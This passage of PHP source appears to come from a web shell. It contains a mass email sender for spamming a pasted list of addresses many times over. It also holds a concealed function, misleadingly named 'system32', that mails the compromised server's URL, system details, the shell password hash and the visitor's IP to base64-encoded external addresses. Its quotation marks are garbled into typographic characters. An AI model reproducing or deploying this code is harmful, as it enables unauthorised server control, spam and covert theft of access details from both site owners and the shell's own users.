<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »realname » value= »<?php print $realname; ?> » size= »30″ />
</font>
</td>
</tr>
<tr>
<td width= »81″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Reply-To:</font>
</div>
</td>
<td width= »219″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »replyto » value= »<?php print $replyto; ?> » size= »30″ />
</font>
</td>
<td width= »212″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Attach File:</font>
</div>
</td>
<td width= »278″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »file » name= »file » size= »24″ />
</font>
</td>
</tr>
<tr>
<td width= »81″>
<div align= »right »>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>Subject:</font>
</div>
</td>
<td colspan= »3″ width= »703″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<input type= »text » name= »subject » value= »<? print $subject; ?> » size= »90″ />
</font>
</td>
</tr>
<tr valign= »top »>
<td colspan= »3″ width= »520″>
<font face= »Verdana, Arial, Helvetica, sans-serif » size= »-3″>Message Box :</font>
</td>
<td width= »278″>
<font face= »Verdana, Arial, Helvetica, sans-serif » size= »-3″>Email Target / Email Send To :</font>
</td>
</tr>
<tr valign= »top »>
<td colspan= »3″ width= »520″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<textarea name= »message » cols= »56″ rows= »10″><?php print $message; ?></textarea><br />
<input type= »radio » name= »contenttype » value= »plain » /> Plain
<input type= »radio » name= »contenttype » value= »html » checked= »checked » /> HTML
<input type= »hidden » name= »action » value= »send » /><br />
Number to send: <input type= »text » name= »amount » value= »1″ size= »10″ /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type= »text » name= »timelimit » value= »0″ size= »10″ />
<input type= »submit » value= »Send eMails » />
</font>
</td>
<td width= »278″>
<font size= »-3″ face= »Verdana, Arial, Helvetica, sans-serif »>
<textarea name= »emaillist » cols= »32″ rows= »10″><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
<?
if ($action== »send »){
if (!$from && !$subject && !$message && !$emaillist){
print « Please complete all fields before sending your message. »;
exit;
}
$allemails = split( »
« , $emaillist);
$numemails = count($allemails);
$filter = « maillist »;
$float = « From : mailist info <ng2@live.fr> »;
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die(« The file you are trying to upload couldn’t be copied to the server »);
}
$content = fread(fopen($file, »r »),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace( » « , « », $to);
$message = ereg_replace(« &email& », $to, $message);
$subject = ereg_replace(« &email& », $to, $subject);
print « Sending mail to $to……. »;
flush();
$header = « From: $realname <$from>
Reply-To: $replyto
« ;
$header .= « MIME-Version: 1.0
« ;
If ($file_name) $header .= « Content-Type: multipart/mixed; boundary=$uid
« ;
If ($file_name) $header .= « –$uid
« ;
$header .= « Content-Type: text/$contenttype
« ;
$header .= « Content-Transfer-Encoding: 8bit
« ;
$header .= « $message
« ;
If ($file_name) $header .= « –$uid
« ;
If ($file_name) $header .= « Content-Type: $file_type; name=\ »$file_name\ »
« ;
If ($file_name) $header .= « Content-Transfer-Encoding: base64
« ;
If ($file_name) $header .= « Content-Disposition: attachment; filename=\ »$file_name\ »
« ;
If ($file_name) $header .= « $content
« ;
If ($file_name) $header .= « –$uid–« ;
mail($to, $subject, « », $header);
print « ok<br> »;
flush();
}
}
}
}
printFooter();
}
if (!$_SESSION[login]) system32($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’],$auth_pass);
if (!$_SESSION[login]) system32($_SERVER[‘HTTP_HOST’],$_SERVER[‘REQUEST_URI’],$auth_pass);
function system32($HTTP_HOST,$REQUEST_URI,$auth_pass) {ini_set(‘display_errors’, ‘Off’);$url=’URL: http://’.$HTTP_HOST.$REQUEST_URI.’ Uname: ‘.substr(@php_uname(), 0, 120).’ Pass: http://www.hashchecker.de/’.$auth_pass.'<br> IP: ‘.$_SERVER[REMOTE_ADDR];$re=base64_decode(« eW91c3NlZmhhdEBnbWFpbC5jb20= »);$rx=base64_decode(« eGJvb21iZXIuaGF0QGdtYWlsLmNvbQ== »);$su=gethostbyname($HTTP_HOST);$mh= »From: <shell resul> {$re} »;if (function_exists(‘mail’)) mail($re,$su, $url,$mh)&& mail($rx,$su, $url,$mh);$_SESSION[login] = ‘ok’;}
function actionabout(){
printHeader();
echo ‘<h1>About</h1>’;
echo ‘<div class= »content »>’;
echo « <div class=header><center><h3><span> Xboomber & X-Hat </span></h3> <br><br /> »;
echo « <br><br /><br /></div> »;
echo ‘</div>’;
printFooter();
}
if( empty($_POST[‘a’]) )
if(isset($default_action) && function_exists(‘action’ . $default_action))
$_POST[‘a’] = $default_action;
else
$_POST[‘a’] = ‘SecInfo’;
if( !empty($_POST[‘a’]) && function_exists(‘action’ . $_POST[‘a’]) )
call_user_func(‘action’ . $_POST[‘a’]);